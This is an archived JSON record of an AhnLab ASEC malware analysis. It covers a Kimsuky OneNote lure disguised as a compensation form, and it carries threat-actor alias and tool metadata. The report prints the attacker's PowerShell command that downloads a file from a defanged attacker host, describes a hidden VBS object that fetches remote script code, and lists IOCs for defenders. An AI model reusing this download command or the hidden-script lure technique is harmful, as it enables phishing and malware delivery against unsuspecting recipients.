{ "id": "9cfb954c-eaf2-4b4e-af71-5e9621072748", "created_at": "2026-04-06T00:06:32.987544Z", "updated_at": "2026-04-10T03:37:40.933897Z", "deleted_at": null, "sha1_hash": "7e5bcc9b5ab7d25c428cd5a1b662f926bd1b3cb7", "title": "OneNote Malware Disguised as Compensation Form (Kimsuky) - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2248389, "plain_text": "OneNote Malware Disguised as Compensation Form (Kimsuky) -\r\nASEC\r\nBy ATCP\r\nPublished: 2023-03-19 · Archived: 2026-04-05 13:16:29 UTC\r\nAhnLab Security Emergency response Center (ASEC) has discovered the distribution of a OneNote malware\r\ndisguised as a form related to compensation. The confirmed file is impersonating the same research center as the\r\nLNK-type malware covered in the post below. Based on the identical malicious activity performed by the VBS\r\nfiles, the team has deduced that the same threat actor is behind both incidents.\r\nAs shown in the figure below, a page discussing compensation appears when the OneNote file is opened, and\r\nprompts users to click on what appears to be the area where an HWP file is attached.\r\nhttps://asec.ahnlab.com/en/50303/\r\nPage 1 of 4\n\nFigure 1. Contents displayed upon opening the OneNote file\r\nFigure 2 makes it clear that this area does not contain an HWP file; rather, it conceals a malicious script object\r\nnamed ‘personal.vbs’.\r\nFigure 2. Concealed malicious script\r\nIf a user clicks on this script, the malicious VBS file is created and executed under the filename personal.vbs in a\r\ntemporary directory. The code of the generated VBS file makes the following, obfuscated command appear like an\r\nannotation before re-reading it to decrypt and execute the malicious command.\r\nhttps://asec.ahnlab.com/en/50303/\r\nPage 2 of 4\n\nFigure 3. personal.vbs code\r\nThe decrypted script code ultimately accesses hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1 to\r\nexecute an additional script code. This URL is currently inaccessible, but its URL format reveals that it most likely\r\nexecuted an information-stealing script like the one in the post below.\r\nAfterward, it downloads and opens an HWP file from hxxp://delps.scienceontheweb.net/ital/info/sample.hwp\r\nthrough a PowerShell command. \r\nExecuted PowerShell command powershell $curpath=(New-Object -ComObject\r\nShell.Application).NameSpace(‘shell:Downloads’).Self.Path;Invoke-WebRequest -Uri\r\nhxxp://delps.scienceontheweb.net/ital/info/sample.hwp -OutFile $curpath\\personal.hwp;start-sleep -\r\nseconds 1\r\nFigure 4. Ultimately executed script code\r\nAlthough the HWP file could not be downloaded during the time of analysis, it is presumed that a normal HWP\r\nfile was used in order to deceive users. Additionally, as the filename of the HWP file in the OneNote is the same\r\nas the filename (PersonalDataUseAgreement.hwp) shown in Figure 10 of the post \u003cMalware Distributed\r\nDisguised as a Password File\u003e (PersonalInfoUseAgreement.hwp), it is assumed that a similar HWP file was used\r\nin this case as well.\r\nDue to recent confirmed cases of the Kimsuky group distributing malware in various forms such as CHM, LNK,\r\nand OneNote, which were previously distributed as Word files, users are strongly advised to exercise extra\r\nhttps://asec.ahnlab.com/en/50303/\r\nPage 3 of 4\n\ncaution. These files are usually distributed via emails disguised as forms related to compensation or personal\r\ninformation, so users must practice caution when opening email attachments.\r\n[File Detection] Dropper/MSOffice.Generic (2023.03.20.02) Trojan/VBS.Generic.SC186657 (2023.03.03.00) \r\nMD5\r\naa756b20170aa0869d6f5d5b5f1b7c37\r\nf2a0e92b80928830704a00c91df87644\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//delps[.]scienceontheweb[.]net/ital/info/list[.]php?query=1\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/50303/\r\nhttps://asec.ahnlab.com/en/50303/\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://asec.ahnlab.com/en/50303/" ], "report_names": [ "50303" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775433992, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7e5bcc9b5ab7d25c428cd5a1b662f926bd1b3cb7.pdf", "text": "https://archive.orkl.eu/7e5bcc9b5ab7d25c428cd5a1b662f926bd1b3cb7.txt", "img": "https://archive.orkl.eu/7e5bcc9b5ab7d25c428cd5a1b662f926bd1b3cb7.jpg" } }